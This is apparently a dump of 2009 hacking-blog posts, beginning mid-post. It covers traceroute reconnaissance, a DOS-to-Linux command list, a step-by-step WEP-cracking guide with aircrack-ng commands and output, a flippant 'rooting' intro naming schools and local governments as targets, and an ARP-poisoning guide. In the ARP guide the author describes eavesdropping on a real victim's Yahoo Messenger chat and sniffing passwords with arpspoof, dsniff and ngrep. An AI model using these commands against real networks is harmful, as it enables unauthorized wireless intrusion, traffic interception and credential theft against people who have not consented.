/><br />16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]<br /><br />Trace complete.<br /><br /><br /><br />Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.<br /><br /><br /><br />Now carefully looking at the results you can figure out many information about yahooâ??s server [216.115.108.243]<br /><br />First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line youâ??ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahooâ??s server vl20.bas1.snv.yahoo.com . Now you got the address of yahooâ??s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.<br /><br />Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahooâ??s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahooâ??s server.<br /><br /><br /><br />Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.<br /><br /><br /><br />Firewall Detection<br /><br /><br /><br />While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.<br /><br /><br /><br />Example<br /><br /><br /><br />Some days ago I tried to tracert hotmailâ??s server in plain and simple way using tracert without any trick.This is what I found out :<br /><br /><br /><br /><br />c:windows>tracert 64.4.53.7<br /><br /><br /><br />Tracing route to lc2.law5.hotmail.com [64.4.53.7]<br /><br /><br />over a maximum of 30 hops:<br /><br /><br /><br /><br /><br /><br />1 * * * Request timed out.<br /><br />2 161 ms 147 ms 85 ms 203.90.69.81<br /><br />3 126 ms 261 ms 219 ms 203.90.66.9<br /><br />4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]<br /><br />5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]<br /><br />6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]<br /><br />7 826 ms 731 ms 819 ms 213.232.106.9<br /><br />8 885 ms 744 ms 930 ms 213.166.3.209<br /><br />9 851 ms 1020 ms 1080 ms 213.232.64.54<br /><br />10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]<br /><br />11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]<br /><br />12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]<br /><br />13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]<br /><br />14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]<br /><br />15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]<br /><br />16 * * * Request timed out.<br /><br />17 * * * Request timed out.<br /><br />18 * * * Request timed out.<br /><br />19 * * * Request timed out.<br /><br />20 * * * Request timed out.<br /><br />21 * * * Request timed out.<br /><br />22 * * * Request timed out.<br /><br />23 * * * Request timed out.<br /><br />24 * * * Request timed out.<br /><br />25 * * * Request timed out.<br /><br />26 * * * Request timed out.<br /><br />27 * * * Request timed out.<br /><br />28 * * * Request timed out.<br /><br />29 * * * Request timed out.<br /><br />30 * * * Request timed out.<br /><br />Trace complete.<br /><br /><br />I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.<br /><br /><br /><br />Detecting Traceroute Attempts on your System<br /><br /><br /><br />You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:<br /><br /><br /><br />1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.<br /><br /><br /><br />2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.<br /><br /><br /><br />3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message..http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-53438462120713249752009-06-23T10:18:00.000-07:002009-06-23T10:20:11.673-07:00Translating DOS to LinuxDOS Command: dir, dir/w<br />Linux Equivalent: ls, ls -l<br /><br />DOS Command: chdir (Current directory)<br />Linux Equivalent: pwd<br /><br />DOS Command: del (remove a file)<br />Linux Equivalent: rm<br /><br />DOS Command: deltree (remove a directory and all files under it)<br />Linux Equivalent: rm -r<br /><br />DOS Command: copy<br />Linux Equivalent: cp<br /><br />DOS Command: xcopy (copy all files in a directory and under it)<br />Linux Equivalent: cp -R<br /><br />DOS Command: rename, move<br />Linux Equivalent: mv<br /><br />DOS Command: type (print contents of a file to the screen)<br />Linux Equivalent: cat<br /><br />DOS Command: help, <command> /?<br />Linux Equivalent: man<br /><br />DOS Command: cls (clear screen)<br />Linux Equivalent: clear<br /><br />DOS Command: find (search for a word or words in a specified file)<br />Linux Equivalent: grep<br /><br />DOS Command: fc (compare two files and find differences between them)<br />Linux Equivalent: diff<br /><br />DOS Command: set (show environment variables)<br />Linux Equivalent: env<br /><br />DOS Command: set variable (set environment variable)<br />Linux Equivalent: export<br /><br />DOS Command: edit filename<br />Linux Equivalent: vi filename, pico filename, nano -w filename (varies based on editor of choice)<br /><br />DOS Command: attrib +h filename (makes a file hidden)<br />Linux Equivalent: mv file .file<br /><br />DOS Command: mem (displays available memory)<br />Linux Equivalent: free, top<br /><br />DOS Command: scandisk<br />Linux Equivalent: fsck<br /><br />DOS Command: defrag c:\<br />Linux Equivalent: debugfs<br /><br />DOS Command: format<br />Linux Equivalent: mke2fs, mk32fs -j, mkreiserfs, mkswap, etc. (varies based on desired filesystem)<br /><br />DOS Command: pkzip (creates archive of file)<br />Linux equivalent: tar, used often in conjunction with gzip for compression)<br /><br />DOS Command: tracert<br />Linux Equivalent: traceroute<br /><br />DOS Command: ipconfig (check IP address and network settings)<br />Linux Equivalent: ifconfig<br /><br />DOS Command: nbtstat -a hostname (get DNS info for specified host)<br />Linux Equivalent: nslookup hostname<br /><br />DOS Command: route print (display routing table)<br />Linux Equivalent: route -n<br /><br />DOS Command: net send host/ip message send message to another computer<br />Linux Equivalent: smbclient -M Windows Host, talk (Linux hosts).http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-85799770689464547112009-06-23T10:12:00.000-07:002009-06-23T10:13:13.357-07:00WiFi HackingClientless WEP Cracking<br />Before Starting, Ensure:<br /><br />Your hardware supports packet injection. You can verify this by using Wireshark.<br /><br />You are within range of an ap. Just because you can see packets transmitted from the ap, doesn't mean you can send them to the ap if the distance is too great. Usually card strength is less than that of the transmit power of an ap.<br /><br />The ap is transmitting.<br /><br />The ap is using WEP with Open Authentication. If SKA(Shared Key Authentication) is being used, you must have captured the PRGA xor data previously.<br /><br />You are using v0.8 of aircrack-ng. Other versions may need different command variations.<br /><br />Equipment used:<br />MAC of card doing the injecting: 00:11:22:33:44<br />BSSID (AP's MAC): 13:13:13:13:13<br />ESSID (Wireless network name): TEST<br />Access point channel: 9<br />Wireless interface: rausb0<br /><br />Solution Overview<br /><br />Here are the basic steps we will be going through:<br />1 - Start wireless interface on monitor mode on correct channel<br />2 - Fake authenticate using aireplay-ng with the -1 option<br />3 - Initiate a fragmention attack to obtain a PRGA<br />4 - Use packetforge-ng to make an arp packet using the PRGA previously obtained<br />5 - Use airodump-ng to capture IVs<br />6 - Inject the arp packet created by packetforge-ng in step 4<br />7 - Run aircrack-ng/ptw to crack WEP key<br /><br />Step 1 - Start the wireless interface in monitor mode on AP channel<br /><br />Enter the following command to start the wireless card on channel 9 in monitor mode:<br />airmon-ng start wifi0 9<br /><br /> <a href="http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels" target="_blank">http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels</a> -Use this page if you want to convert the frequency to channel number.<br /><br />Troubleshooting Tips:<br /><br />If another interface started other then rausb0 then you can use that one or use “airomon-ng stop athX†where X is each interface you want to stop.<br /><br />Step 2 - Use aireplay-ng to do a fake authentication with the access point<br /><br />An ap will not accept a packet from a MAC that is not associated with it. If the source MAC address you are injecting is not associated, the AP ignores the packet and sends out a “DeAuthentication†packet. No new IVs are created in this situation as the AP is ignoring any packets with the unassociated MAC in them.<br /><br />Use aireplay-ng to fake authenticate to an AP.<br />aireplay-ng -1 0 -e TEST -a 13:13:13:13:13 -h 00:11:22:33:44 eth1<br /><br />Where:<br />-1 means fake authentication<br />0 reassociation timing in seconds<br />-e TEST is the wireless network name<br />-a 13:13:13:13:13 is the access point MAC address<br />-h 00:11:22:33:44 is our card MAC addresss<br />rausb0 is the wireless interface name<br />Success looks like:<br />18:18:20 Sending Authentication Request<br />18:18:20 Authentication successful<br />18:18:20 Sending Association Request<br />18:18:20 Association successful :-)<br /><br />Or another variation for picky access points:<br />aireplay-ng -1 6000 -o 1 -q 10 -e TEST -a 13:13:13:13:13 -h 00:11:22:33:44 eth1<br /><br />Where:<br />6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent.<br />-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.<br />-q 10 - Send keep alive packets every 10 seconds.<br />Success:<br />18:22:32 Sending Authentication Request<br />18:22:32 Authentication successful<br />18:22:32 Sending Association Request<br />18:22:32 Association successful :-)<br />18:22:42 Sending keep-alive packet<br />18:22:52 Sending keep-alive packet<br /># and so on.<br />Failed authentication:<br />8:28:02 Sending Authentication Request<br />18:28:02 Authentication successful<br />18:28:02 Sending Association Request<br />18:28:02 Association successful :-)<br />18:28:02 Got a deauthentication packet!<br />18:28:05 Sending Authentication Request<br />18:28:05 Authentication successful<br />18:28:05 Sending Association Request<br />18:28:10 Sending Authentication Request<br />18:28:10 Authentication successful<br />18:28:10 Sending Association Request<br /><br />Do NOT proceed beyond this step if fake authentication is not working.<br /><br />Troubleshooting Tips:<br />Some APs implement MAC filtering. In this case, it is necessary to know one of the MACs of any computers that use the target Access Point. Use macchanger to spoof MACs.<br /><br />Step 3 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA<br /><br />The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random genration algorithm) bit file. It is not the WEP key itself, nor can it decrypt packets. However, it is used to create new packets. You can use chopchop or fragmention attacks to obtain a PRGA. When one attack doesn't work against an AP, use the other one. Visit aircrack-ng.org to see the pros and cons of each attack.<br /><br />Fragmentation attack:<br />aireplay-ng -5 -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0<br />Where:<br />-5 means the fragmentation attack<br />-b 13:13:13:13:13 is the access point MAC address<br />-h 00:11:22:33:44 is the MAC address of our card and must match the MAC used in the fake authentication<br />rausb0 is the wireless interface name<br />The system will respond:<br /> aireplay-ng -5 -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0 <br /> Waiting for a data packet...<br /> Read 127 packets...<br /> <br /> Size: 114, FromDS: 1, ToDS: 0 (WEP)<br /> <br /> BSSID = 13:13:13:13:13<br /> Dest. MAC = 01:00:5E:00:00:FB<br /> Source MAC = 00:40:F4:77:E5:C9<br /> <br /> 0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@.<br /> 0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e<br /> 0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.).<br /> 0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..;<br /> 0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O.<br /> 0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2......<br /> 0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj.<br /> 0x0070: 9c9f ..<br /> <br /> Use this packet ? y<br />When a packet from the access point arrives, enter “y†to proceed. You may need to try a few to be successful.<br />When successful, the system reponds:<br /> Saving chosen packet in replay_src-0203-180328.cap<br /> Data packet found!<br /> Sending fragmented packet<br /> Got RELAYED packet!!<br /> Thats our ARP packet!<br /> Trying to get 384 bytes of a keystream<br /> Got RELAYED packet!!<br /> Thats our ARP packet!<br /> Trying to get 1500 bytes of a keystream<br /> Got RELAYED packet!!<br /> Thats our ARP packet!<br /> Saving keystream in fragment-0203-180343.xor<br /> Now you can build a packet with packetforge-ng out of that 1500 bytes keystream<br />Success! The file “fragment-0203-180343.xor†can then be used in the next step to generate an arp packet.<br />Troubleshooting Tips<br />Sometimes the first packet won't work. Try a few more. This goes for both attacks. Visit aircrack-ng.org for more information on the chopchop attack.<br /><br />Step 4 - Use packetforge-ng to create an arp packet<br /><br />Use the PRGA from the last step. Look for the file ending in "xor". Packetforge-ng uses this PRGA to make an arp packet. Hopefully, when injected, the ap will rebroadcast it and a new IV can be obtained. <br />packetforge-ng -0 -a 13:13:13:13:13 -h 00:11:22:33:44 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request<br />Where:<br />-0 means generate an arp packet<br />-a 13:13:13:13:13 is the access point MAC address<br />-h 00:11:22:33:44 is MAC address of our card<br />-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)<br />-l 255.255.255.255.255 is the source IP (most APs respond to 255.255.255.255)<br />-y fragment-0203-180343.xor is file to read the PRGA from<br />-w arp-request is name of file to write the arp packet to<br />The system will respond:<br /> Wrote packet to: arp-request<br /><br />Step 5 - Start airodump-ng<br /><br />Open another console session to capture the generated IVs. Then enter:<br />airodump-ng -c 9 --bssid 13:13:13:13:13 --ivs -w capture rausb0<br />Where:<br />-c 9 is the channel for the wireless network<br />- -bssid 13:13:13:13:13 is the access point MAC address. This eliminate extraneous traffic.<br />- -ivs specfifies that you only want to capture the IVs. This keeps the file as small as possible. (Do not use --ivs if you wish to crack using aircrack-ptw)<br />-w capture is file name prefix for the file which will contain the IVs.<br />rausb0 is the interface name.<br /><br />Step 6 - Inject the arp packet<br /><br />Using the console session where you generated the arp packet, enter:<br />aireplay-ng -2 -r arp-request rausb0<br />Where:<br />-2 means use interactive frame selection<br />-r arp-request defines the file name from which to read the arp packet<br />rausb0 defines the interface to use<br />The system will respond:<br /> Size: 68, FromDS: 0, ToDS: 1 (WEP)<br /> <br /> BSSID = 13:13:13:13:13<br /> Dest. MAC = FF:FF:FF:FF:FF:FF<br /> Source MAC = 00:09:5B:EC:EE:F2<br /> <br /> 0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[...<br /> 0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z...<br /> 0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8.<br /> 0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^<br /> 0x0040: 6ada 92f2 j...<br /> <br /> Use this packet ? y<br />Enter “y†to use this packet. The system responds by showing how many packets it is injecting and reminds you to start airodumump if it has not already been started:<br /> Saving chosen packet in replay_src-0204-104917.cap<br /> You should also start airodump-ng to capture replies.<br /><br /> End of file.<br /><br />While this command is successfully running, the airodump-ng screen will look similar to:<br /> CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04<br /> <br /> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br /> <br /> 13:13:13:13:13 47 100 179 2689 336 9 11 WEP WEP TEST <br /> <br /> BSSID STATION PWR Lost Packets Probes <br /> <br /> 13:13:13:13:13 00:11:22:33:44 29 0 2707 <br />Notice that the station packets are roughly equal to the BSSID data packets. This indicates injection is working well. The data rate of 336 packets per second is an indicator that the injection is working well.<br /><br />Step 7 - Run aircrack-ng to obtain the WEP key<br /><br />Start another console session and enter:<br />aircrack-ng *.ivs -b 13:13:13:13:13<br />Where:<br />*.ivs selects all files ending in “ivsâ€.<br />-b 13:13:13:13:13 selects the one access point we are interested in<br /><br />You can run this while generating packets. Before long, the WEP key will be calculated displayed. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. These are approximations. You may need more or less.<br /><br />Troubleshooting Tips:<br />Sometimes you need to try various techniques to crack the WEP key. Try “-n†to set various key lengths. Use “-f†and try various fudge factors. Use “-k†and try disabling various korek methods.<br />(For Aircrack-ptw) enter:<br />aircrack-ng -z *.cap -b 13:13:13:13:13*<br />*Aircrack-ptw is specified by using the "z" switch to the aircrack-ng command. Also, ptw can only used .cap files.<br />Aircrack-ptw uses a different algorithm and cracks keys with a fraction of the data necessary. I've cracked 128 bit WEP with only 25k ivs.<br /><br />Alternate Solution:<br />Here is a way that basically takes any packet broadcasted by the access point and converts it to a broadcast packet so that the AP generates a new IV.<br /><br />The con to this technique is that if you receive a 1000 byte packet you then rebroadcast 1000 bytes. This can slow down the packet/sec rate substantially. The pro to this is that this process is simple. If you're lucky, you will get a small packet for rebroadcasting. With a small packet, this solution is comparable to the aforementioned process.<br /><br />As always, fake authenticate first. <br />Enter the following command:<br /> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0<br />Where:<br />-2 means use interactive frame selection<br />-p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.<br />c FF:FF:FF:FF:FF:FF sets the destination MAC address to be a broadcast. This is required to cause the AP to replay the packet and thus getting the new IV.<br />-b 13:13:13:13:13 is the access point MAC address<br />-h 00:11:22:33:44 is the MAC address of our card and must match the MAC used in the fake authentication<br />rausb0 defines the interface to use<br />The system will respond:<br /> Read 698 packets...<br /><br /> Size: 86, FromDS: 1, ToDS: 0 (WEP)<br /><br /> BSSID = 13:13:13:13:13<br /> Dest. MAC = FF:FF:FF:FF:FF:FF<br /> Source MAC = 00:D0:CF:03:34:8C<br /><br /> 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.<br /> 0x0010: 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.*<br /> 0x0020: 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#..<br /> 0x0030: ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_......<br /> 0x0040: 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg....<br /> 0x0050: f043 09f6 5418 .C..T.<br /><br /> Use this packet ? y<br />You enter “y†to select the packet and start injecting it. Remember, the smaller the packet, the better. You then start injecting:<br /> Saving chosen packet in replay_src-0411-145110.cap<br /><br /> Sent 10204 packets...(455 pps)<br /><br />If you have not already started airodump-ng, be sure to start it now. Once you have sufficient IVs, you can start aircrack-ng and attempt to crack the WEP key.<br /><br />Another variation of this attack is to use packets from a previous capture. You must have captured the full packets, not just the IVs.<br />Here is what the command would look like:<br /> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13 -h 00:11:22:33:44 -r capture-01.cap rausb0<br />Where " -r capture-01.cap†is data from a previous capture.<br /><br /><a href="http://www.aircrack-ng.org/" target="_blank"><br /></a>.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-22932983843849000792009-06-23T10:00:00.001-07:002009-06-23T10:01:38.051-07:00Rooting a Windows Machine : Rooting ?What is rooting? Many ask this question, it can be explained simply, The hacking you see in those bad "H@cker" flicks. "Yo, DeepSeven, Im inside the FBI's Super-mega-Secret Mainframe,Yeah", "OK 0Nine, Crack the GRAPLAP encryption with a reverse hybrid mega crack." Yeah stuff like that, Breaking directly into another Computer.Heres some terms to understand me and my tutorials better,<br /><br />Some Terms I use but not nessasaily other people<br /><br />Foo-Total mastery of a Subject; A Fucking Fly Hack; Note not even I have performed a root-attack worthy of "Foo". Like Better then "Deep Magic"<br /><br />Blue Moon - An Easy Hack, Someone with no firewall and or filesharing enabled<br /><br />Red Moon - An almost impossible hack, a hack with almost no known Vulnerabilities<br /><br />Terminology Everyone Uses -<br /><br />Vuln/Exploit -A Coding error which allows remote access<br /><br />Service - A non-temporal running program which may open sockets to the internet etc.<br /><br />Rootkit - A Almost-indetectable Backdoor<br /><br />Things to Keep in Mind before rooting -<br />1. ALL Systems connected to the internet can be rooted<br /><br />2. Rooting is Difficult<br /><br />3.Rooting Can be Fun<br /><br />4.Though most of the time it sucks<br /><br />5.There is always a Hacker who can school you<br /><br />6. Advanced Rooting NEEDS knowledge of C and if you like C++<br /><br />7. Other languages are helpful too<br /><br />8. Rooting can be very difficult to understand.<br /><br />Systems You COULD probably Root<br /><br />-Your School<br />-Your Local Government<br />-Yourself<br />-Your Mom<br />-Any Computer run by a retard<br /><br />Systems you probably COULD NOT root<br /><br />-The Pentagon<br />-The CIA<br />-Yahoo.com<br />-Google.com<br />-Any Computer which is not connected to the internet<br /><br />Thats a nominal intro to the world of Rooting.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-82118297148457830692009-06-23T09:55:00.000-07:002009-06-23T09:58:53.197-07:00mitm by arp poisoning - LinukWell I noticed the linux area kinda empty so I decided to fix that ^_^ with a little something I pulled in teh last few days. First of all you should understand how Local Area Netowrks (LANs) work. On a hubbed network (or an 802.11 wireless one) when a computer sends data to another one, teh hub sends that data to ALL hosts in the network while only the intended reciecver accepts it while all the others just drop it. Running a sniffer such as ethereal on a hubbed network (which sets your NIC into promiscuous mode) captures all that data that should be discarded and lets you view it. On switched networks though things are more secure. A switch only sends data to the intended reciever <period>. To do this, hosts on a LAN use a protocol caled ARP (Address Reslution Protocol) which translated IP addresses on a LAN to MAC addresses (a supposedly unique address to each NIC, there are ways of spoffing your MAC address though). Let's say teh switch would recieve a piece of data and wants to send it to 192.168.0.2, it has to know which port to send it to (i mean a physical port on the switch, not your virtual ports), in other words on which wire to transmit it. So the host which sends the data broadcasts an ARP request like: "Who has 192.168.0.2 gimme your MAC address" to which 192.168.0.2 would respond "I'm 192.168.0.2, my MAC address in AA:BB:CC:11:22:33" (completely bogus MAC address used there for demonstrtive purposes) and then the host would send that data to the switch(along with the destination MAC address) and the switch to the intended MAC address. One flaw in ARP is that it considers ALL responses valid, so it doesn't need to send a request to get an answer. It just considers ALL answers valid. So if I were to keep sending specially crafted arp responses to a host saying "I'm 192.168.0.2, my mac address is AA:BB:CC:44:55:66" then all packets from that host destined for 192.168.0.2 would be rerouted to me. That's coz as I send these packets continuously and 192.168.0.2 only sends 1 when it's asked for it, the host recieves more packets from me before it gets to send that data so it ends up sending it to the latest MAC address for 192.168.0.2 (this is called arp poisoning). Now MITM stands for Man-In-The-Middle. An attack of this nature means turning your computer into an invisible proxy between to other computers, basically turning:<br /><br />192.168.0.2<-------->192.168.0.3 into<br />192.168.0.2<--->my_ip_address<--->192.168.0.3<br /><br />This can be accomplished by arp poisoning the 2 hosts and forwarding the recieved packets. To do a MITM between 192.168.0.2 and 192.168.0.3 you'd arp poison 192.168.0.2 into thinking you're 192.168.0.3 and 192.168.0.3 into thinking you're 192.168.0.2 and DON'T FORGET to turn on packet forwarding coz if you don't you kill the connection between the 2 hosts. Next up i'm gonna show you how to sniff packets between 2 hosts on teh same LAN using 'arpspoof' and 'ethereal'. Arpspoof is found in the 'dsniff' package and ethereal comes with almost every Linux distro. For this example I used the auditor boot cd which can be found at remote-exploit.org . What I wanted to do was listen in on Yahoo Messenger convos. So I did teh following:<br /><br />First I turned on ip forwarding 'echo 1 > /proc/sys/net/ipv4/ip_forward'<br />Then I chose my victim <img alt="http://icons.iconarchive.com/icons/iconicon/shiny-smiley/cool-icon.jpg" src="http://icons.iconarchive.com/icons/iconicon/shiny-smiley/cool-icon.jpg" />, at the time I knew 192.168.0.5 was having a YahooMesenger convo so I did:<br />'arpspoof -t 192.168.0.5 192.168.0.99' which makes 192.168.0.5 believe that i'm 192.168.0.99, sending all packets with destination 192.168.0.99 to me. Now 192.168.0.99 is teh gateway in my LAN so it's our link with the internet therefore all packets for YahooMessenger must pass through it.<br /><br />Then I did:<br /><br />'arpspoof -t 192.168.0.99 192.168.0.5' which makes all packets from the internet to 192.168.0.5 pass through me (now if I didn't do this i'd only get half the conversation, what 192.168.0.5 sends,to be exact).<br /><br />Now I turned on ethereal and started capturing all packets which pass through eth0 (my only NIC) and selected real-time update for the captured packets (coz I want my list of captured packets updated as tehy are captured). The following list should flood with packets (mostly ARP packets coz you send tons of them out), so it was a good idea to select the filter 'YMSG' which only shows you teh yahoo meseneger packets. A good option is to get teh 'ngrep' utility if you wanna sniff out for certain keywords. 'ngrep pass' would show me all packets containing the string 'pass' and the 'dsniff' utility which automatically looks for HTTP, FTP, POP3 etc passwords and displays them in a readable context. Another good utility found on the auditor cd id 'webspy' which redirects your netscape browser to URLs sniffed from captured packets, allowing you to surf in parallel with the victim (a cool party trick lol ). If you have any questions on this article don't hesitate to PM me.<br /><br /></period>.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0